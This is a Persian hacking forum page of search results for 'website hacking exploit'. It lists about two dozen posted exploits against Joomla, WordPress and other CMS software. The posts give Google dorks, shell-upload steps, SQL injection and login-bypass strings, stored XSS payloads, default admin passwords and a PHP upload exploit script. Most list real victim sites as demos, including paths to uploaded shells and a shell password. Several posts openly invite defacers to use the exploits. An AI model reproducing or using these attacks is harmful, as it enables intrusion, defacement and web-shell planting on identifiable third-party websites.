• Black
  • Blueberry
  • Slate
  • Blackcurrant
  • Watermelon
  • Strawberry
  • Orange
  • Banana
  • Apple
  • Emerald
  • Chocolate
  • Charcoal

عضویت ویژه طلایی گارد ایران با تخفیف 50%

برای عضویت کلیک کنید

جستجو در تالار: در حال نمایش نتایج برای برچسب های 'اکسپلویت هک سایت'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالار ها

  • انجمن های فعال
    • قوانین و اطلاعیه های سایت
    • سوال و جواب های عمومی
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • اخبار هک و امنیت
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • اکسپلویت های ثبت شده توسط تیم امنیتی گارد ایران
    • برنامه ها و ابزارهای نوشته توسط گارد ایران
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • بخش کرک و رمزنگاری
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Mikrotik
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

30 نتیجه پیدا شد

  1. # Exploit Title: joomla com_garyscookbook file upload # Dork Google: "inurl:com_garyscookbook" poc: localhost/path/index.php?option=com_garyscookbook&func=newItem ########################### upload shell php and go 2 : localhost/path/components/com_garyscookbook/img_pictures/shell.php ############################ 1) http://www.kouzinapapanagiotou.gr/index.php?option=com_garyscookbook&func=newItem http://www.kouzinapapanagiotou.gr//components/com_garyscookbook/img_pictures/dz-hp-0.php 2) http://oneiron.gr/index.php?option=com_garyscookbook&func=newItem http://oneiron.gr/components/com_garyscookbook/img_pictures/dzdz-hp-0.php 3 ) https://www.vitamix.co.uk/index.php?option=com_garyscookbook&func=newItem https://www.vitamix.co.uk//components/com_garyscookbook/img_pictures/help.php
  2. * Title : SadafBlog Script Cross Site Scripting ( Xss Stored ) * Date : 6/19/2017 * Dork : inurl:list.php intitle:فهرست وبلاگ ها * Author : GIST * YouTube : https://youtu.be/a1hN9KC3wUQ * Version : All Version * Script Download : https://goo.gl/d7yDrt * Vendor HomePage : - * Tested On : Windows 10 About Script : Sadaf Blog SCript for blogs is beautiful and diverse capabilities including the ability to recruit blogs, etc. Some Of Facilities Of Sadaf Blog Script : 1-Allowing verification of reader comments to display 2-Assign a URL 3-The possibility of exclusive design templates or change in form, color and design blog 4-Ability to insert labels for each entry 5-Allocates 300 MB for upload in the blog admin panel And ... Exploit : 1- Open Target 2- Register A New Weblog ( Usually You Can Find It 'register' or 'register.php' ) 3- Complet Fields. 4- In Field Of Title Weblog Have To Use Inspect Element To Removing restrictions Of Character Delete This Part ' maxlength="60" ' 5- Input Your Deface Page in Title WEblog Filed 6-Click Save And Go To List Of Weblogs ( Usually You Can Find It 'list' or 'list.php' ) 7- You Will See Your Deface Page :) Demo : http://raziblog.ir/ http://shikblog.ir/ http://7blog.ir/ https://cxsecurity.com/issue/WLB-2017060128
  3. ###################### # ____ _ ____ ____ ___ ____ _ ____ _ # __ _| __ ) / | _ / ___|_ _| _ | | |___ / | # / / _ / _ | | | | | _ | || |_) | | __) | | # > <| |_) / ___ | |_| | |_| || || _ <| |___ / __/| | # /_/_____/_/ _____/ ____|___|_| ______|_____|_| # ###################### # Exploit Title : Joomla com_breezingforms Arbitrary File Upload # Exploit Author : xBADGIRL21 # Dork : inurl:index.php?option=com_breezingforms # Software link : https://crosstec.org/en/downloads/breezingforms-for-joomla.html'>https://crosstec.org/en/downloads/breezingforms-for-joomla.html # Vendor Homepage : https://crosstec.org/en/ # version : 1.8.x # Tested on: [ BACK BOX ] # skype:xbadgirl21 # Date: 01/08/2016 # video Proof : ###################### # [+] FILE UPLOAD : ###################### ###################### # [+] DESCRIPTION : ###################### # [+] BreezingForms is the only state of the art form builder for Joomla!® that combines # [+] modern techniques with enterprise features. From great looking simple forms up to complex form applications # [+] -- almost everything is possible! # [+] and an Shell Upload has been Detected in this component ###################### # [+] PoC : ###################### # 1.- SELECT A WEBSITE FROM THE DORK ABOVE # 2.- http://localhost/joomla/ # 3.- check this Directory if you have Access to it : media/breezingforms/uploads/ # 4.- fill the fields # 5.- Upload your Shell like :shell.php.Txt or Image to Upload Field # 6.- Shell Directory : media/breezingforms/uploads/yourfile.txt or the extension uploaded # Ex : http://www.sps-training.com/media/breezingforms/uploads/a.txt ###################### # [+] Live Demo: ###################### # http://www.sps-training.com/index.php?option=com_breezingforms&view=form&Itemid=248 #http://www.alaeu.com/index.php?option=com_breezingforms&tmpl=component&Itemid=145&ff_contentid=24&ff_form=1&ff_applic=plg_facileforms&format=html&ff_frame=1〈=en #http://www.westernerdays.ca/index.php?option=com_breezingforms&Itemid=137&ff_form=2&ff_applic=mod_facileforms&ff_module_id=134&format=html&tmpl=component&ff_frame=1 ###################### # [+] File Path : ###################### # http://www.localhost/media/breezingforms/uploads/yourfile.txt ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ###################### اگر متوجه نشدید از محتوای اکسپلویت فایل آموزش تصویری رو از یوتیوب دریافت کنید
  4. ثبت اکسپلویت Natural Software CMS SQL Injection Vulnerability توسط تیم امنیتی گارد ایران. http://iedb.ir/exploits-5423.html ########################### # Natural Software CMS SQL Injection Vulnerability ########################### * Title : Natural Software CMS SQL Injection * Date : 7/5/2016 * Exploit Author : MR.IMAN * Google Dork: intext:"Natural Software" & inurl:pages.php?ID= * Vendor Homepage: http://www.usps.org/newpublic2/join.html * Version : All Version * Category: webapps * Tested On : windows 10,kali linux HEllo Guys. This Is a bypas Sql Injecdtion Vulnerability and you can Inject this site whit out of bypass Bypass union select : -Before Number ID & /*!50000union*/+select PoC: vulnerable : wrappers/pages.php?ID= Vulnerability : Sql Injection Response : Error reading pages select * from pages where page_id = ---------------------------------- Demo : http://www.flpowersquadron.org/wrappers/pages.php?ID=25%27 http://www.oshkoshsquadron.org/wrappers/pages.php?ID=14%27 http://www.uspsdistrict4.org/wrappers/pages.php?ID=14%27 http://www.capefearsailandpowersquadron.org/wrappers/pages.php?ID=4' http://www.santaclarapowersquadron.org/wrappers/pages.php?ID=38%27 * Special Tnx : cod3!nj3ct!0n , REX , MR.IMAN , alizombie , dastmale-sorkh , 1TED , Mr.Root * Discovered By : MR.IMAN * We Are Guardiran Security Team ########################### # Iranian Exploit DataBase = http://IeDb.Ir [2016-07-21] ###########################
  5. سلام به دوستان عزیز. آسیب پذیری در BBcode ادیتور انجمن ساز IP.board که چند روز پیش توسط تیم امنیتی گارد ایران کشف و گزارش شد متاسفانه آسیب پذیری رو به نام خودشون به ثبت میرسوندن. خوب پس تصمیم گرفتیم آسیب پذیری رو ثبت کنیم ولی میدونیم که از این آسیب پذیری سو استفاده هایی خواهد شد. پس سریع تر اقدام به رفع این آسیب پذیری کنید لینک های آموزشی : یوتیوب آپاراتhttp://www.aparat.com/v/KbtVs http://iedb.ir/exploits-5406.html ########################### # IPB BBcode Editor Cross Site Scripting Vulnerability ########################### * Title: IPB BBcode Editor Cross Site Scripting * date: 7/15/2016 * Exploit Author : Guardiran Security Team * Google Dork : intext:\"Community Forum Software by IP.Board \" * Vendor Homepage: https://invisionpower.com/features/apps * Application : http://invision-virus.com/forum/index.php/files/file/388-ipboardv346-illuson-nulled/ * Version : All Version * Tested On : Kali Linux w3af / Windows 8.1 HEllo Guys. This Is a Xss Vulnerability Our forums application is the latest incarnation of the industry-leading IP.Board community forum software, powering thousands of communities online. Redesigned for even greater integration with the IPS Community Suite, it\'s the most powerful way to enable discussion on your website. ------------------ Description XSS: This CMS And Have Xss Vulnerability. We Cnd Run Our Script In site. The First Havt To Register. After the confirmation e-mail account settings up.Go to the Edit Signature Use of the press BBcode.Then choose one of the options The box of available codes Paige put Deface.Better code is written in Java Script Sample Deface Page JavaScript : http://s6.picofile.com/file/8259569200/new_1.txt.html [Or] You can send in a post above actions.This vulnerability by sending an e also will be displayed Use of the press BBcode.Then choose one of the options The box of available codes Paige put Deface.Better code is written in Java Script Also The vulnerability is approved zone-h.org.It is also well documented Demo: http://forum.mythicwow.com/ http://five-m.ir/forum/ http://owl-gaming.com/forum/ http://forum.t-pasokhgoo.ir/ http://surin.ir/ http://www.nosazihormozgan.ir/forums/ * Special Tnx : cod3!nj3ct!0n , REX , alizombie , DR.GrYgHoN , MR.IMAN , reza attacker , 1TED , Comrade , dastmale-sorkh * Discovered By : MR.IMAN ~~ Y!D:demon.hacker37 * We Are Guardiran Security Team ########################### # Iranian Exploit DataBase = http://IeDb.Ir [2016-07-16] ###########################
  6. ثبت اکسپلویت Hyper Net It Solution cms Sql Injection Vulnerability توسط تیم امنیتی گارد ایران. این اکسپلویت توسط J.ALL_EdIT0r کشف شد و کامل و ثبت شد.تشکر از دوستا عزیزمون. http://iedb.ir/exploits-5368.html ########################### # Hyper Net It Solution cms Sql Injection Vulnerability ########################### # Exploit Title: Hyper Net It Solution cms Sql Injection # Google Dork: intext:\"Developed by Hyper Net It Solution\" & inurl:id= # Date: 6/28/2016 # Exploit Author: Guardiran Security Team # Vendor Homepage: http://hypernetsolutions.com/ # Version: All Version # Tested on: windows 10,kali linux # Category: webapps HEllo Guys. This Is a Sql Injection Vulnerability You Can Inject The Sites Without Bypass ---------------------------------- SQL INJECTION : This CMS And Also Have SQLI Vulnerability. We Cnd Found The Vulnerability With Putting The \" or \' After Number ID Demo : http://svnmvedu.in/page.php?id=35 http://smdmahavidyalaya.org/page.php?id=43 http://mgpiti.com/page.php?id=32%27 http://www.samarpancollege.in/page.php?id=26 http://madhavpublicschool.org/news.php?id=41%27 Response: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'\'43\'\'\' at line 1 * Special Tnx : cod3!nj3ct!0n , REX , MR.IMAN , alizombie , dastmale-sorkh , 1TED , Reza Attcker * Discovered By : J.ALL_EdIT0r * We Are Guardiran Security Team ########################### # Iranian Exploit DataBase = http://IeDb.Ir [2016-07-03] ###########################
  7. ثبت اکسپلویت jayashri combine cms Sql Injection vulnerability توسط تیم امنیتی گارد ایران. این اکسپلویت توسط J.ALL_EdIT0r کشف شده و کامل شد و ثبت شد.تشکر از دوست عزیزمون. http://iedb.ir/exploits-5369.html ########################### # jayashri combine cms Sql Injection vulnerability ########################### * Title : jayashri combine cms Sql Injection vulnerability * Exploit Author : Guardiran Security Team * Google Dork: intext:\"Solution By : Jaya Shri Combine\" inurl:\"id=\" * Date: 6/25/2016 * Vendor Homepage: http://www.jayashricombine.com/ * Version : All Version * Tested On : windows 10,kali linux HEllo Guys. This Is a Sql Injection Vulnerability You Can Inject The Sites Without Bypass ---------------------------------- SQL INJECTION : This CMS And Also Have SQLI Vulnerability. We Cnd Found The Vulnerability With Putting The \" or \' After Number ID Demo : http://www.warunamanamperi.com/awardsinfo.php?id=4%27 http://www.imexlanka.com/usedvehicleinfo.php?id=106%27#.V24pVfkrLcc http://www.lankaprimelands.com/moreinfo.php?id=124%27 http://kumuduni-ayurveda.com/pages.php?id=8%27 http://nooraniyyah.org/staffinfo.php?id=16%27#.V24pYfkrLcc http://www.matarabusiness.com/business_info.php?id=1661%27 http://www.dbl.lk/eventinfo.php?id=17%27 http://www.dbautomation.lk/productinfo.php?id=25%27 * Special Tnx : cod3!nj3ct!0n , REX , MR.IMAN , alizombie , dastmale-sorkh , 1TED , Mr.Root * Discovered By : J.ALL_EdIT0r * We Are Guardiran Security Team ########################### # Iranian Exploit DataBase = http://IeDb.Ir [2016-07-03] ###########################
  8. سلام دوستان. براتون یک اکسپلویت 0day آماده کردم از پلاگین Mod_jvTwitter در جوملا که تو هیچ فروم امنیتی وجود نداره وفقط یک فیلم در یوتیوب توسط نویسنده اون موجود هست. امیدوارم لذت ببرید. دقت کنید برای استفاده از این اکسپلویت باید پایتون 2.7 نصب کنید. روش استفاده: اکسپلویت رو در دسکتاپ با نام explit.py قرار میدید.دقت کنید باید پسوند اکسپلویت py. باشد. سپس در cmd دستورات زیر رو وارد کنید. cd Desktop exploit.py website/modules/mod_jvtwitter/jvtwitter.php موفق و پیروز باشید joomla_mod_jvtwitter_0day_exploiter.txt
  9. # Exploit Title: Joomla Component com_smartformer shell upload Vulnerability # Dork Google : inurl:"index.php?option=com_smartformer" Exploit : Go To # http://localhost/index.php?option=com_smartformer&Itemid=34 # upload shell.php # Your shell : http://localhost/components/com_smartformer/files/x.php ############################ # Demo : # 1) http://www.bmjournal.in/components/com_smartformer/files/x.php # 2) http://www.advancelitho.co.ke/components/com_smartformer/files/x.php # 3) http://www.securesystems.com.au/components/com_smartformer/files/x.php # Shell password => dz0
  10. # Exploit Title: joomla com property unrestricted file upload image php # Dork Google : inurl:/com_osproperty #1.Go to this route Ingrese a esta ruta http://site.com/component/osproperty/?task=agent_register ############################# #2.Complete the form, raising the shell.php instead of your photo Complete el formulario, subiendo la shell.php en lugar de su foto ############################# #3.Locate your file in the root /osproperty/agent/ Busque su archivo en la raiz /osproperty/agent/ http://site.com/images/osproperty/agent/randomid_yourshell.php ############################# #Help:This path can help you find your web shell in case you need it Este path le puede ayudar a encontrar su web shell en caso q lo necesite component/osproperty/?task=agent_default
  11. ###################### # Exploit Title : Telepecas Script Admin Page Default Password Vulnerability # Vendor Homepage : https://www.telepecas.com/index.php # Date: 2016/04/07 ###################### # PoC: # user = admin # Password = admin # Demo: # http://www.rcr.pt/admin/ # http://www.sucatao.pt/admin/ # http://www.site.reciparts.pt/admin/ # http://www.rodauto.pt/admin/ # http://renovepecas.com/admin/
  12. ###################### # Exploit Title : Canoas Web Host Admin Page Bypass # Vendor Homepage : http://canoasweb.com.br/comae/ # Google Dork : intext:" Desenvolvido por Canoas Web Host" # Date: 11 Apr 2016 # Tested On : Kali / iceweasel ###################### # # Search dork and select Target , put /admin/login.php after url such as : # http://site.com/admin/login.php # Now enter fill Login(username) and Senha(Password) like the information below : # Login : '=' 'OR' # Senha : '=' 'OR' # # e.g: # http://www.kraemer-rs.com.br/admin/login.php # http://www.polysul.com.br/admin/login.php # http://relusilsul.com.br/admin/login.php # http://www.donatomoveisedecoracoes.com.br/admin/login.php # http://www.lcdmonitores.com.br/admin/login.php # http://wmgp.com.br/admin/login.php # http://www.construtoraepoca.com.br/admin/login.php # http://canoasweb.com.br/comae/admin/login.php # http://supremaexpress.com/admin/login.php # http://www.marcenariadonato.com.br/site/admin/login.php
  13. ###################### # Exploit Title : Art23 Israel Cms Admin Bypass # Vendor Homepage : http://www.art23.co.il/ # Google Dork: intext:"Art23" , intitle:"Art23" & inurl:"admin" # Date: 11 Apr 2016 # Tested On : Kali / iceweasel ###################### # # Search dork and select Target , put /admin/login.php after url such as : # http://site.com/admin/login.php # Now enter fill Login(username) and Senha(Password) like the information below : # Login : '=' 'OR' # Senha : '=' 'OR' # # e.g: # http://roni-ort.co.il/admin/login.php # http://vilamaya.co.il/admin/login.php # http://sinai-carpets.com/admin/login.php # http://simonab.co.il/admin/login.php # http://topnail.co.il/admin/login.php # http://smartkid.co.il/admin/login.php # http://hy-spa.co.il/admin/login.php # http://mihart.co.il/admin/login.php # http://yptolo.co.il/admin/login.php # http://www.tipul-beomanut.co.il/admin/login.php # http://grands.co.il/admin/login.php # http://www.amos-hatzadik.co.il/admin/login.php
  14. ###################### # Exploit Title : Epark IT Schools Management Admin Page Bypass # Vendor Homepage : http://www.epark-it.com # Google Dork : intext:"Developed by Epark IT" site:.edu.bd # Date: 12 Apr 2016 # Tested On : Kali / iceweasel ###################### # # Search dork and select Target , put /settings after url such as : # http://site.com/settings # Now enter fill Username and Password like the information below : # Username : '=' 'OR' # Password : '=' 'OR' # # e.g: # http://ruddreshwarsc.edu.bd/settings/ # http://dmsararpar.edu.bd/settings/ # http://www.dharmopurajc.edu.bd/settings/ # http://nutandulal.edu.bd/settings/ # http://uttarbahs.edu.bd/settings/ # http://baburali.edu.bd/settings/ # http://chalbaladalefm.edu.bd/settings/ # http://geniusacademyjhs.edu.bd/settings/ # http://panchgachism.edu.bd/settings/ # http://dalgramhs.edu.bd/settings/ # http://sacollegebogra.edu.bd/settings/ # http://nssdakhilmadrasah.edu.bd/settings/
  15. |[+] Exploit Title: Wordpress Product Options for WooCommerce Plugin File Upload |[+] |[+] Software Link: http://codecanyon.net/item/product-options-for-woocommerce-wp-plugin/7973927 |[+] |[+] Google Dork: inurl:/woocommerce-product-options/includes/ |[+] |[+] Date: 11.04.2016 |[+] |--------------------------------------------------------------| |[+] Exploit: VICTIM/wp-content/plugins/woocommerce-product-options/includes/image-upload.php |[+] |[+] Description: Change your shell's extension "shell.php" to "shell.php;.jpg" and upload your shell |[+] |[+] Your files uploaded to VICTIM/wp-content/uploads/filename |[+] |[+] OR |[+] |[+] VICTIM/wp-content/[year]/[month]/filename |[+] |[+] Examples: |[+] |[+] http://www.detasselingppe.com/wp-content/plugins/woocommerce-product-options/includes/image-upload.php |[+] |[+] http://medindex.am/wp-content/plugins/woocommerce-product-options/includes/image-upload.php |[+] |[+] http://www.bo3generacion.es/wp-content/plugins/woocommerce-product-options/includes/image-upload.php
  16. سلام. کاربران عزیز این اکسپلویت تاریخ پابلیکش همین امروز بوده. دیفیسر های عزیز استفاده کنند. # Exploit Title: Joomla Image Upload - Arbitrary File Upload # Google Dork: inurl:option= # Vendor Homepage: http://tuts4you.de/ # Software Link: http://tuts4you.de/96-development/156-simpleimageupload # Version: 1.0 # Tested on:Win32 # Vuln Same to Com_Media Vulnerability ########################## POST /index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc ########################### tamper data Host:127.0.0.1 User-Agent=Mozilla/5.0 (Windows NT 6.1; rv:46.0) Gecko/20100101 Firefox/46.0 Accept=text/html/php,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language=en-US,en;q=0.5 Accept-Encoding=gzip, deflate Cookie=92e1ffe3bb23e8a366ff65194917235e=15168f4d2be2ab52b9730a55b4674ae5 Connection=keep-alive Content-Type=multipart/form-data; boundary=---------------------------281102171512373 Content-Length=49328 POSTDATA =-----------------------------281102171512373 Content-Disposition: form-data; name="Filedata"; filename="Neme fail.php" Content-Type: image/jpeg -----------------------------281102171512373 Content-Disposition: form-data; name="return-url" aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWpmb3JtX2FydGljbGV0ZXh0 -----------------------------281102171512373-- your Fail neme shell. http://www.bonyadtabari.ir//images/pic/neme fail.php ######################################### # Exploit : <?php echo '<form action="#" method="post" enctype="multipart/form-data"> <input type="text" name="target" value="www.localhost.com" /><input type="submit" name="Pwn" value="Pwn!" /> </form>'; if($_POST) { $target = $_POST['target']; $file = "0wn3d ! ;)"; $header = array("Content-Type: application/x-php", "Content-Disposition: form-data; name="Filedata"; file="L0v3.php.""); $ch = curl_init("http://".$target."/index.php?option=com_simpleimageupload&task=upload.upload&tmpl=component"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36"); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$file", "return-url" => "aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=",)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER, $header); $result = curl_exec($ch); curl_close($ch); print "$result"; } else { die(); } ?> ######################################### Demo: http://dartmoorscenictours.co.uk/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_text http://www.khamphoempittaya.ac.th/en/?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_content http://www.smarterhomesolutions.net/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_text http://www.agescirimini.it/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=comment
  17. سلام. ایم اکسپلویت تاریخ پابلیکش امروزه دوستان دیفیسر استفاده کنند. اگر هم میتونید شل آپلود کنید. |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------| |[+] Exploit Title: Admin Page Bypass [ 3Pixels® Media ] By 1337r00t |[+] |[+] Vendor Homepage: http://www.3pixelsltd.com/ |[+] |[+] Google Dork: intext:Site Credits: 3Pixels® Media |[+] |[+] Tested on: Windows 10 , Mozilla Firefox |[+] |[+] Date: 9/4/2016 |[+] |--------------------------------------------------------------| |[+] Exploit : |[+] |[+] Note: Download Tool [NoRedirect] On addons Mozilla Firefox |[+] |[+] |[+] Admin Url :- |[+] http://[$Site]/backend/ |[+] |[+] |[+] |[+] 1- Run Tool NoRedirect |[+] 2- Add Site New |[+] 3- Add: ^[$site]/backend/ |[+] 4- Open Link : http://[$site]/backend/dashboard.php |[+] |--------------------------------------------------------------| |[+] Demo:- |[+] |[+] http://www.sixthsensedecor.com/backend/ |[+] http://whistleschildrensplace.com/backend/
  18. سلام. دوستان این اکسپلویت تاریخ پابلیکش امروز بوده استفاده کنید. ###################### # Exploit Title : Telepeças Script Admin Page Default Password Vulnerability # Vendor Homepage : https://www.telepecas.com/index.php # Date: 2016/04/11 ###################### # PoC: # user = admin # Password = admin # Demo: # http://www.rcr.pt/admin/ # http://www.sucatao.pt/admin/ # http://www.site.reciparts.pt/admin/ # http://www.rodauto.pt/admin/ # http://renovepecas.com/admin/
  19. درود. ابتدا گوگل دورک: intext:"Powered by MAXSITE 1.10" پنل ادمین: /index.php?name=admin Type in: ' OR '1'='1' -- For both username and password and then login. (Don't forget to add space after --) Demo: Demo: http://www.asianlife.byethost4.com/index.php?name=admin http://pyc.payap.ac.th/chi2009/index.php?name=admin http://www.lannapoly.ac.th/web2550/quality/web/index.php?name=admin
  20. سلام خدمت دوستان. HitlrHacker عزیز این آسیب پذیری رو کشف کردن و بنده اکسپلویتش کردم و به ثبت رسوندمش. موفق باشید https://cxsecurity.com/issue/WLB-2016020054 ######################################################## # Exploit Title: acemedia SQL Injection ######################################################## # Date: [2016/2/4] # Google Dork: intext:طراحی توسط acemedia inurl:?id= # Exploit Author: Guardiran Security Team =>hitlrhacker # Vendor Homepage: [http://www.acemedia.ir/] # Software Link: [-] # Version: All Version # Tested on: [windows 8.1 & Google Chrome] ######################################################## # DISCRIPTION: Hello Guys.This vulnerability is SQL type # We put ["] we can get the MySQL error # For Example: # [http://www.irtu.ir/index.php?id=19%22]'>http://www.irtu.ir/index.php?id=19%22] # GooD LucK ######################################################## # Demo: # http://www.irtu.ir/index.php?id=19%22 # http://iasbs.ac.ir/math/dep=4%22 # http://www.naria.info/view/14.aspx?id=346%22 # http://www.ir-translate.com/PU/link/ftc_page.aspx?id=1003107%22 ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | alizombie | DeMoN | ColEctOR # We Are Guardiran Security Team # Discovered By:hitlrhacker ########################################################
  21. سلام مجدد. خوب اینم دومین باگ جوملا که اینم رده HIGH هست خدمت شما عزیزان گل تیم. ثبت اکسپلویت Joomla Remot File Upload Vulnerability به نام تیم امنیتی گارد ایران. https://cxsecurity.com/issue/WLB-2015110194 http://iedb.ir/exploits-4198.html ######################################################## # Exploit Title: Joomla Remot File Upload Vulnerability ######################################################## # Google Dork1: inurl:index.php?option=com_media & site:com # Google Dork2: inurl:index.php?option=com_media & site:org # Google Dork3: inurl:index.php?option=com_media & site:net # Date: [22/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [https://developer.joomla.org/joomlacode-archive/issue-29776.html] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys.This Is A Olugin Of Joomla For Upload Files. # Exploit: # Add This Link After Address Target # /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder # For Exmple: Site.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder ######################################################## # Demo: # http://drugfreeclubXsofamerica.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder # http://www.saba4X215.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder # http://www.johnwargoX.com/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=com_content&author= # http://www.diffhospitXal.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder # http://www.smartcaXrleasing.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder # http://fvteamsportXs.com/joomla/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ######################################################## My Friends The First GoD C0d3!nj3ct!0n REX abarestan GrYpHoN MR.R3DHAT
  22. سلام خدمت دوستان عزیز گارد ایران. خوب یک دو روزی کم رنگ بودم برگشتم با ثبت دوتا باگ رده HIGH برای تیم و شما عزیزان که کلی سایت دیفیس کنین. ثبت اکسپلویت Joomla Autostand File Upload Vulnerability به نام تیم امنیتی گارد ایران. https://cxsecurity.com/issue/WLB-2015110195 http://iedb.ir/exploits-4199.html ######################################################## # Exploit Title: Joomla Autostand File Upload Vulnerability ######################################################## # Google Dork: inurl:/images/autostand/ # Date: [22/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://100cms.org/extension/joomla/4801-Autostand] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys. # This Is Like As RFU Bug. # You Can Upload Your Image In Your Target. # Also You Can Bypass Your Shell To .jpg Then Upload It In Target. ######################################################## # Exploit: # Add This Link To Target After This The Words: # /pt/ | /asp/ And The Other Words # {/index.php?option=com_autostand&func=newItem} ######################################################## # Demo: # http://smartXonecity.com/pt/index.php?option=com_autostand&func=newItem # http://smaXrtonecity.com/pt/index.php?option=com_autostand&func=newItem #http://www.antaresXmotors.cl/asp/index.php?option=com_autostand&func=newItem # http://autoschapaXs.com/index.php?option=com_autostand&func=newItem # http://lepetitvo.cXom/index.php?option=com_autostand&func=newItem # http://www.geeX-wagen.co.uk/index.php?option=com_autostand&func=newItem # http://www.auXtorimessafranco.com/index.php?option=com_autostand&func=newItem # http://www.fXirstcar45.fr/annonces-automobile/newitem ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ######################################################## My Friends The First GoD C0d3!nj3ct!0n REX abarestan GrYpHoN MR.R3DHAT
  23. ثبت اکسپلویت (e107 v2 Bootstrap CMS XSS Vulnerability) به نام تیم امنیتی گارد ایران(Guardiran Security Team). به امید پیشرفت های روز افزون تیم بزررگ گارد ایران. https://cxsecurity.com/issue/WLB-2015110174 ######################################################## # Exploit Title: e107 v2 Bootstrap CMS XSS Vulnerability ######################################################## # Google Dork: Proudly powered by e107 # Date: [19/11/2015] # Exploit Author: Guardiran Security Team =>DeMoN # Vendor Homepage: [http://e107.org/] # Software Link: [-] # Version: All Version # Tested on: [Win 8.1/Google chrome] # CVE : [-] ######################################################## # DISCRIPTION: Hello Guys. # CMS user details section is vulnerable to XSS. You can run XSS payloads. # XSS Vulnerability #1: # Go Update user settings page # "http://{target-url}/usersettings.php" # Set Real Name value; # "><script>alert(String.fromCharCode(88, 83, 83))</script> # or # "><script>alert(document.cookie)</script> ######################################################## # Thanks to : C0d3!Nj3ct!0N | REX | abarestan | GrYpHoN | BLACKH4T # We Are Guardiran Security Team # Discovered By:DeMoN ######################################################## My Friends The First GoD C0d3!nj3ct!0n REX abarestan GrYpHoN MR.R3DHAT
